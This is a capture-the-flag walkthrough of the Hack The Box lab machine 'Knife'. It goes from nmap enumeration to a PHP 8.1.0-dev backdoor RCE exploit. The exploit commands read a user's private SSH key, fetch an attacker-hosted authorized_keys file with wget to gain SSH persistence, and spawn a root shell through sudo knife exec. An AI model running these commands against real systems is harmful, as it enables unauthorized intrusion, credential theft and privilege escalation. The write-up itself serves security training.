Knife

Knife is an easy machine from Hack The Box.

Enumeration

nmap as always.

nmap -sC -sV knife.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pretty simple box, as expected. SSH and HTTP. I’ll take a look at the web page first.

Pasted image 20210602163656

It’s a pretty non-functional site. None of the buttons take me anywhere, and the page source doesn’t reveal any particularly interesting information. I ran gobuster to try and enumerate subdirectories, but not much there either.

I open up Burpsuite and intercept my request for the homepage:

Pasted image 20210602163915

The response headers reveal that the site is running PHP/8.1.0-dev. Now that’s something I can work with.

Exploitation

A quick google search turns up an unauthenticated RCE exploit.

To verify it works, I run python3 php.py -u http://10.10.10.242/ -c whoami as a proof of concept.

Pasted image 20210602134420

Looks like I do indeed have RCE. After a bit of (unsuccessful) fumbling around with various reverse shells and payloads, I start looking for a more persistent solution.

I can view james private SSH key by running python3 php.py -u http://10.10.10.242/ -c "cat /home/james/.ssh/id_rsa":

Pasted image 20210602170635

I tried to crack it with john but no dice. Can I write to that directory?

Pasted image 20210602171355

I sure can! This means I should be able to copy my own public key into an authorized_keys file, and use my private key to SSH in.

I generate a keypair with ssh-keygen, place it in a file called authorized_keys, and host that on my own web server with sudo python -m SimpleHTTPServer 80.

Run a command to download the key file and place it in /home/james/.ssh/:

python3 php.py -u http://10.10.10.242/ -c "wget http://10.10.14.16:8080/authorized_keys -P ~/.ssh/"

After verifiying that the file was written to the SSH directory correctly, I can easily SSH in as james:

ssh -i /home/kali/.ssh/id_rsa james@10.10.10.242

Pasted image 20210602171958

And I’m on as james.

Privilege Escalation

Of course, I run sudo -l first, to see if james has any sudo permissions:

Pasted image 20210602152152

They are able to run knife as root without a password. After looking at the help page for the knife binary, I see that there is an exec subcommand, that I can use to make system calls. Seems easy enough.

sudo knife exec -E 'system("su")'

Pasted image 20210602172315

Just like that, Knife has been owned.

Written on August 28, 2021